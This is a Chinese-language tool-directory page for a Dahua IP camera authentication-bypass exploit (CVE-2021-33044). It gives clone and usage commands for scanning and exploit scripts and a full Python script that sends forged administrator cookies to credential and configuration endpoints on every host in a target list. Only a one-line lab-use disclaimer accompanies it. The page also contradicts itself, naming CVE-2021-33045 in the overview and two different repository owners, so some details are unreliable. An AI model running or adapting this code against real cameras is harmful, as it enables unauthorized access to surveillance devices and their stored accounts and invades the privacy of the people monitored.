Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Camera-Dahua-Research-l-h-ng-CVE-2021-33044 — DAHUA_AUTH-BYPASS-CVE-2021-33044 | Kitploit
工具/GitHubGitHub/litndat/camera-dahua-research-l-h-ng-cve-2021-33044
Authentication & AuthorizationIoT SecurityVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationRed Teaming

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
GitHub
litndat/camera-dahua-research-l-h-ng-cve-2021-33044

Camera-Dahua-Research-l-h-ng-CVE-2021-33044

DAHUA_AUTH-BYPASS-CVE-2021-33044

查看仓库
1个月前尚未审核

Dahua认证绕过PoC模拟利用 (CVE-2021-33044)

概述

Dahua IP摄像头是安防监控系统中广泛使用的物联网设备。由于常部署在内网或可从互联网访问,IP摄像头的安全漏洞会严重影响隐私和信息安全。

CVE-2021-33045是存在于某些Dahua摄像头系列中的安全漏洞,允许未经身份验证即可非法访问内部配置资源。该漏洞源于设备固件中访问控制机制不严格。

漏洞信息

项目内容
CVECVE-2021-33044
类型Authentication Bypass
严重程度Critical (CVSS ~9.8)
认证无需认证
影响范围Dahua Camera / DVR / NVR

原因

漏洞源于Dahua摄像头固件中不安全的认证设计:

  • 服务器未正确检查session/token
  • 信任客户端发送的数据
  • 一些敏感的配置端点仅检查cookie是否存在,而不检查实际访问权限

这使得攻击者可以:

  • 伪造认证过程
  • 完全绕过登录

参考:

  • NVD CVE-2021-33044
  • http://seclists.org/fulldisclosure/2021/Oct/13

认证绕过机制的工作方式

正常流程

root@kitploit:~
→ 客户端发送带有任意cookie的HTTP请求
→ 摄像头在界面层检查cookie
→ 后端未验证有效session
→ 允许直接访问内部配置端点
→ 返回敏感数据

脚本

File目的

使用方法

安装

root@kitploit:~
# Clone repository
git clone https://github.com/eagle-nett/DAHUA_AUTH-BYPASS-CVE-2021-33044.git
cd DAHUA_AUTH-BYPASS-CVE-2021-33044

pip install requests

网络扫描

root@kitploit:~
# Scan subnet (ports required)
python dahua_scanner.py https://example.com -p 80 8080 8800

# Single host with port
python dahua_scanner.py https://example.com

常用Dahua端口:80,443, 8080, 37777, 37778

利用CVE漏洞

root@kitploit:~
python dahua_exploit.py https://example.com -p 8081
python dahua_exploit.py https://example.com -c 2021-33044  #CVE
python dahua_exploit.py --help

认证绕过

root@kitploit:~
python dahua_auth_bypass.py https://example.com -p 8080
python dahua_auth_bypass.py https://example.com  # Dump thiết bị sau khi bypass

示例

root@kitploit:~
#!/usr/bin/env python3
import requests, sys
requests.packages.urllib3.disable_warnings()

def dump_accounts(ip, port=80):
    base = f"http://{ip}:{port}"
    cookies = {
        "userName": "admin",
        "userLevel": "1",
        "sessionID": "00000000"
    }
    urls = [
        "/current_config/passwd",
        "/current_config/Account1",
        "/current_config/UserMgr",
        "/current_config/accounts"
    ]

    for path in urls:
        try:
            r = requests.get(
                base + path,
                cookies=cookies,
                verify=False,
                timeout=8
            )
            if r.status_code == 200 and len(r.text) > 30:
                print(f"[+] {ip}:{port}  VULNERABLE → {path}")
                return
        except:
            pass

    print(f"[-] {ip}:{port}  safe / patched")

for line in open("targets.txt"):
    t = line.strip()
    if not t or t.startswith("#"):
        continue
    ip = t.split(":")[0]
    port = int(t.split(":")[1]) if ":" in t else 80
    dump_accounts(ip, port)

解释

  • 脚本使用requests库,并主动禁用SSL警告以避免警告信息

  • 函数dump_accounts(ip, port=80)是负责检查一台摄像头设备的主函数。 该函数的主要功能是:

    • 从IP地址和端口构建URL
    • 通过cookie模拟管理员登录状态
    • 向敏感配置端点发送请求
    • 分析响应以确定设备是否受影响
  • 模拟认证cookie。函数使用以下cookie值:

    • userName=admin
    • userLevel=1
    • sessionID=00000000
  • 在受影响的摄像头版本中,后端不验证实际的sessionID,导致系统认为请求来自有效的管理员账户。

目标列表处理循环

脚本从输入文件读取目标列表,依次对每个设备调用检查函数。这种方法允许自动评估多个摄像头。

image

开发过程

这些脚本基于以下内容开发:

  • NVD发布的CVE详情
  • Dahua的安全公告
  • 公开的PoC参考资料(seclists.org、packetstormsecurity)

测试状态:

  • 认证绕过逻辑根据CVE规范实现
  • 在易受攻击的设备上测试有限。

注意事项

本项目:

  • 仅用于学习和研究目的
  • 请在个人实验室环境中运行
下载工具
CVEs
dahua_scanner.py网络发现 — 查找子网中的Dahua摄像头发现
dahua_exploit.pyMulti-CVE扫描工具 — 检查所有安全漏洞。所有
dahua_auth_bypass.py专用认证绕过,带有--dump选项CVE-2021-33044